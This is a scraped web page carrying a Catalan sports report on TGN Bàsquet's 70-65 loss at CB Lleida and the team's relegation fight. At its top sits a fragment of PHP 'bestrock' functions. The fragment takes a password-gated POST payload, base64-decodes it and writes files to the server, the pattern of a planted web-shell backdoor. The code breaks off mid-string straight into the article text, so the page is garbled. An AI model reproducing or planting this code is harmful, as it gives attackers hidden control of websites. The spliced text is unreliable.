function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior perd a Lleida i ara necessita que el Draft Gramenet guanyi el Sant Fruitós per no baixar de categoria (70-65) - Tgn Bàsquet Club -

El sènior perd a Lleida i ara necessita que el Draft Gramenet guanyi el Sant Fruitós per no baixar de categoria (70-65)

Updated: maig 10, 2019

El sènior del TGN Bàsquet no ha pogut vèncer aquesta nit a Lleida i necessita que el seu rival directe en la lluita per evitar el descens directe, el Sant Fruitós, perdi diumenge (19 h) a la pista del Draft Gramenet (cinquè classificat, però no es juga res en aquesta última jornada) per no descendir a Primera Catalana. El conjunt lila depenia d’ell mateix per evitar el descens, però la derrota contra un gran rival, el CB Lleida, que jugarà la final a quatre d’ascens a Lliga Femenina 2 l’obliga a dependre de resultats de tercers. En tot cas, encara que el Sant Fruitós perdi a Santa Coloma de Gramenet, el conjunt lila hauria de jugar la promoció de descens, el que suposaria però, una oportunitat més per aconseguir la salvació.

Les tarragonines tenien un repte complicat al davant. Tot i que el CB Lleida no es jugava res en el partit perquè ja estava classificat per a la final a quatre, es tracta d’un rival poderós, que en el partit de la primera volta ja va vèncer clarament al Sagrat Cor (49-63). Les liles no arribaven al matx en una bona dinàmica de resultats perquè havien perdut sis dels últims set partits que havien disputat però no tenien cap més remei que anar a totes per tal d’evitar el descens directe.

El matx no ha començat, però gaire bé. Les locals han tingut un encert extraordinari des de la línia de tres punts en el primer període, amb cinc triples anotats i això ha desfet la defensa tarragonina, que no podia amb el bombardeig de les lleidatanes. Durant els primers cinc minuts, però, el TGN Bàsquet ha plantat cara (7-7, minut 5), però aleshores l’allau de joc i encert local ha enfonsat momentàniament les liles (25-10 al final del primer quart).

Un altre triple del CB Lleida només començar el segon quart semblava que faria impossible qualsevol intent d’aconseguir la victòria (28-10), però el TGN Bàsquet, fidel a la seva essència, no ha llençat la tovallola. A còpia de defensa, que ha millorat molt la que ha fet en el primer quart, l’equip tarragoní ha equilibrat el partit i ha evitat que les de la Terra Ferma obrissin un forat més gran (40-28 al descans).

En el tercer període s’ha vist el millor TGN Bàsquet. Intenses, les jugadores de Juan Carlos Arjona han treballat de valent, s’han deixat la pell a la pista i han anat esgarrapant punt a punt al seu adversari. El CB Lleida ja no anotava amb facilitat, cada atac era un patiment per les locals i les tarragonines, molt combatives, han arribat al final del tercer quart amb un desavantatge mínim (50-48) després d’un magnífic parcial de 10-22.

Semblava que la remuntada seria possible. La dinàmica del matx així ho pronosticava, però el CB Lleida ha glaçat les esperances liles amb una bona arrencada a l’últim període. Les locals han enllaçat tres cistelles fàcils i han ensorrat moralment a les tarragonines, que veien com tota la feinada del segon i, sobretot, tercer quart, se n’anava en orris. Les lleidatanes han marcat un parcial de 13-0 en poc més de cinc minuts (63-48) i el somni del triomf s’esmicolava. Però encara hi havia una petita esperança. L’aler Cristina Peña ha ressorgit per mantenir el seu equip amb vida i, amb una cistella de dos i tres triples seguits en tres minuts ha acostat el TGN Bàsquet a sis punts del seu rival (65-59 a 1:10 del final del partit).

Les tarragonines ho han provat però les lleidatanes no s’han deixat sorprendre i no han cedit més terreny fins al final del partit. La derrota impedeix que el TGN Bàsquet eludeixi avui mateix el descens directe (tot i que no podia evitar la promoció) i ara haurà d’esperar que el Sant Fruitós no guanyi al Draft Gramenet  (les de Sant Fruitós de Bages ja van vèncer, però, les de Santa Coloma de Gramenet en la primera volta per 59-53) per no perdre la categoria.